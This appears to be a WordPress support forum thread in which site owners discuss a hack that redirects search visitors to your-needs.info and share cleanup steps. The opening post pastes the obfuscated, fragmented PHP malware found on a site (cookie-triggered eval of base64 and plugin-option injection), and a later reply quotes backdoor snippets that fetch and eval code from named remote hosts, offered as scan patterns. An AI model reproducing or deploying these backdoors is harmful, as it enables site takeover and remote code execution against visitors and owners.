    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/"",/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/strrev($trp_m[1])/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/);/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/$trp_f();/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3RpdGFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/ ?>

    How can I block this hacking attemps? I don't know how the hacker add these code to an image and, of course, to my MySQL database to get out the visitors arriving from google out from my website.

  2. Joni
    Member
    Posted 5 years ago #

    You're running on an unsecure version of WP; the hack was inevitable. Notify your webhost of the breach; locate a backup of your database .. you do have a backup, right?

    ;)

  3. patrickdappollonio
    Member
    Posted 5 years ago #

    Ifn anything needs more information about the attack, my visitors goes to your-needs.info finding the same string that they find at Google.

    If you want to fix by the moment, you can find into the wp_options table at the MySQL database, the table that store the active_plugins and on it, find a "plugin" working with a image extension, that has any name, like your themes images or post images can you have uploaded, when you find them, don't delete the lines at the MySQL database, but find the image/plugin in your directories accesing by ftp and download to your computer and open them with a Notepad or another plain text editor and then delete all the content -the content is like my old post showing up- and upload it again.

    Then, try to access to your weblog using a google search. If the problem persist, find this "rss_f541b3abd05e7962fcab37737f40fad8" in the MySQL server and delete all the content that you have founded.

    Attention: Doing this can get the widget rss support quite inestable, but them repair the exiting visitors leaving your webpage with the code.

    If I find another way to correct them, I've posted them here.

  4. wicked9690
    Member
    Posted 5 years ago #

    I have had this happen to some of my older wordpress blogs also this past week, with the redirection going to the same site; your-needs.info. I noticed this also affects searches going through Yahoo.

    Thanks for the fix Patrick.

  5. goldford
    Member
    Posted 5 years ago #

    Thanks very much for the fix!

  6. wicked9690
    Member
    Posted 5 years ago #

    I think this is going to turn out to be a pretty big exploit that is just gathering steam:

    http://twitter.com/stml/statuses/822612130

  7. patrickdappollonio
    Member
    Posted 5 years ago #

    You're Welcome, wicked and goldford. I'm looking for a most convenient fix to this hack, but maybe the upgrade to a newest version os WordPress has the best.

  8. Dalton
    Member
    Posted 5 years ago #

    Can we just confirm here: this is a hack that affects WordPress 2.5.1 and isn't attributable to a configuration problem or insecure plugin?

    If so, are the developers working on it and has there been an announcement?

  9. moshu
    Member
    Posted 5 years ago #

    If you read the posts above - it is always older versions and not 2.5.1. That's the point. People don't upgrade = get hacked.

  10. Dalton
    Member
    Posted 5 years ago #

    Hi Moshu,
    I'm sorry, I realize that in this particular case the O.P. was not running the newest version, but I have been hearing that others are getting hacked on 2.5.1... that's how I ended up on this thread. I was just hoping that someone could verify.

    And for the record, I think it would be great if the WordPress devs could continue to support older versions for just a little while. It would be great if I could pay someone to roll back security fixes into the 2.3 line for at least 6 months to 1 year, because I know some people are not anxious to upgrade to 2.5 just yet.

  11. Joni
    Member
    Posted 5 years ago #

    Well are they anxious to get hacked? You can't have your cake and eat it too. Either roll back to 2.0.11 or move forward with the latest, greatest, most stable and secure, or risk being hacked. Those are the options.

  12. stml
    Member
    Posted 5 years ago #

    This hack is quite seriously widespread, in that I'm noticing it quite regularly in blog results from Google (as per my tweet someone has posted above), now others have noticed in Yahoo.

    There seems to be little info about it on the web - is it time some more senior Devs looked at this a little more closely?

  13. patrickdappollonio
    Member
    Posted 5 years ago #

    Navigationg with other posts when the users has the same attack, I've looked for an user has the 2.5.1 version and was hacked, too.

    By first font I don't know if this happened with an older version or the newest. I've sended a message from the contact form to Automattic, but doesn't send me an answer.

    (If you're a spanish speaker, the solution is in my Weblog: http://www.marlexsystems.org/mis-visitas-se-redireccionan-hacia-your-needsinfo-que-hacer/)

    Update: In this post an WordPress user say that all version of WP are hacked. He has a few WordPress blogs from 2.1 to 2.5.1 and all has hacked.

  14. Joni
    Member
    Posted 5 years ago #

    I think the problem with stating that 2.5.1 was also hacked is that it's quite possible (in fact, it's probably highly likely) that the hack occurred BEFORE the upgrade and the hacked files were already present when the database was upgraded. Especially if the site owners were unaware that a hack had taken place when they performed the upgrade.

  15. patrickdappollonio
    Member
    Posted 5 years ago #

    Reading a bit, I've founded the problem: http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html That say about a function can edit anything if you have an account.

    (En español: http://www.marlexsystems.org/detectado-el-como-se-realizo-el-hackeo-a-los-blogs-de-wordpress/)

  16. whooami
    Member
    Posted 5 years ago #

    patrickdappollonio,

    There are enough WP exploits out that at this point, that it's a rather safe bet that any number of points of entry can result in a similar symptom.

    if file A can be exploited ⊢ result C
    if file B can be exploited ⊢ result C

    Its the same result, just a different problem.

    Result C doesnt necessarily mean that file A was exploited.

    If you want a secure site, than you have to stay up on the upgrades, you have to make sure that you upgrade properly, you have to keep up on plugin upgrades, you have to have be mindful of file and directory permissions, etc..

    And once compromised, the files should be wiped and replaced, the passwords should all be changed, the secret key should be changed, and the databse should be scoured for anything malicious.

  17. tijja
    Member
    Posted 5 years ago #

    My site was hacked this week also and is redirecting. I have tried everything recommended and still no fix. Replaced plugins, deactivated them, deleted the string in wp-options, etc. This is getting really outrageous that WP is not fixing this!

  18. Joni
    Member
    Posted 5 years ago #

    It's outrageous that you would post at the bottom of this extensive thread, where helpful advice was given, but apparently unheeded by at least you:

    If you want a secure site, than you have to stay up on the upgrades, you have to make sure that you upgrade properly, you have to keep up on plugin upgrades, you have to have be mindful of file and directory permissions, etc.

    And once compromised, the files should be wiped and replaced, the passwords should all be changed, the secret key should be changed, and the database should be scoured for anything malicious.

    Bottom line, UPGRADE or suffer the consequences. It's just that simple. WP is not to blame. Hackers are to blame. Be responsible for your site, your web space. Upgrade when security patches are released.

  19. tijja
    Member
    Posted 5 years ago #

    My WP has been upgraded to 2.5.1 since it was released....so wanna try again???

  20. Joni
    Member
    Posted 5 years ago #

    Then you were hacked BEFORE you upgraded and since you likely did not wipe and replace the hacked files, they carried over into your upgrade.

    Wanna try again?

  21. tijja
    Member
    Posted 5 years ago #

    Nope...I can see from my traffic when I was hacked. It is pretty easy to see when I had a drop of over 1000 people a day and it was last week....long after my upgrade to 2.5.1.

  22. tijja
    Member
    Posted 5 years ago #

    Oh lookie...I restored files to what they were before last week...looooong after upgrade to latest WP version and hack is gone. Yes, folks this hack affects 2.5.1 too. BIG security hole somewhere.

  23. Bob Smith
    Member
    Posted 5 years ago #

    i am coming across so many google results that a redirected due to the hack.

    the silence from the wordpress team is deafening.

    this hack has to affect thousands of blogs.

    incredible.

  24. whooami
    Member
    Posted 5 years ago #

    the silence from the wordpress team is deafening.

    Nice cliche, "Bob". Where, pre tel, would you like to "hear" them? Devs dont post here - as a rule.

    Anyone with something useful to present to the devs that is evidence of there being something insecure in 2.5.1 is encouraged to send an e-mail to security@wordpress.org

  25. andre3
    Member
    Posted 5 years ago #

    Whoami:

    Are you familiar with a solution to this? Is there a fix which will prevent the blogs from getting re-hacked?

    Best Regards,
    Andre

  26. Donncha O Caoimh
    Member
    Posted 5 years ago #

    A few things you need to do if hacked:
    1. Upgrade to the latest version of WP.
    2. Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
    3. Change your passwords after upgrading and make sure the hacker didn't create another user.

  27. EverMaster
    Member
    Posted 5 years ago #

    Those are VERY dangerous:

    Make sure you scan ALL your files for following words in your code:

    if(isset($_GET['p'])) {
        $sock = @fsockopen('km20725.keymachine.de', 80);
        if($sock){
        fwrite ($sock, 'GET http://km20725.keymachine.de/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'].' HTTP/1.0'."\r\n");
        fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");
        while($content[] = fgets ($sock));
        $content = implode('', $content);
        @eval(trim(substr($content, strpos($content, "\r\n\r\n"))));
        fclose ($sock);}
    }
    if(isset($_GET['p'])) {
        @eval(@file_get_contents('http://beliy.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
    }
    if(isset($_GET['p'])) {
        @eval(@file_get_contents('http://seogoogle.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
    }
    eval(gzinflate(base64_decode(

    words:

    k1b0rg in any of your files.

    Once found clean it up!

    If you have broken fingers and want someone to clean it up for you - ring me a bell : icq 119655677

    hey and dont forget to send nice abuse emails to ISP of those guys:

    km20725.keymachine.de
    beliy.us
    seogoogle.us

  28. piratazzurro
    Member
    Posted 5 years ago #

    You can find what patrickdappollonio suggests in my video:
    http://it.youtube.com/watch?v=Obqa6jDV-WQ

    I hope it can help you :)

  29. Bob Smith
    Member
    Posted 5 years ago #

    tried what was suggested in the tutorial. didn't work.

  30. tijja
    Member
    Posted 5 years ago #

    I tried all that was suggested too and it did not work. It was not until I copied over the files in the main WP folder (not the directory folders) that the issue went away. I used clean files and now the hack is gone.

Topic Closed

This topic has been closed to new replies.

About this Topic